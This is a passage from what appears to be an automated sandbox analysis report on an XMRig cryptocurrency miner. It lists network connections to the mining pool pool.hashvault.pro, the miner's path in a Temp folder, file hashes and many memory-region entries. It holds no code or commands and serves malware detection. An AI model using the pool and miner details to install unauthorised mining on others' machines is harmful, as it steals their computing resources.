| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1924-16-0x000001ED91E70000-0x000001ED91E90000-memory.dmp
memory/1924-17-0x000001ED92170000-0x000001ED92190000-memory.dmp
memory/1924-18-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-20-0x000001EE26260000-0x000001EE26280000-memory.dmp
memory/1924-19-0x000001EE26030000-0x000001EE26050000-memory.dmp
memory/1924-21-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-22-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-25-0x000001EE26260000-0x000001EE26280000-memory.dmp
memory/1924-24-0x000001EE26030000-0x000001EE26050000-memory.dmp
memory/1924-23-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-26-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-27-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-28-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-29-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-30-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-31-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-32-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-33-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-34-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-35-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-36-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-37-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-38-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-39-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-40-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-41-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-42-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-43-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-44-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-45-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-46-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-47-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-48-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-49-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-50-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-51-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-52-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-53-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-54-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-55-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-56-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-57-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-58-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-59-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-60-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-61-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-62-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-63-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-64-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-65-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-66-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-67-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-68-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-69-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-70-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-71-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-72-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-73-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-74-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-75-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-76-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-77-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-78-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-79-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-80-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-81-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-82-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-83-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp
memory/1924-84-0x00007FF662EB0000-0x00007FF6639B3000-memory.dmp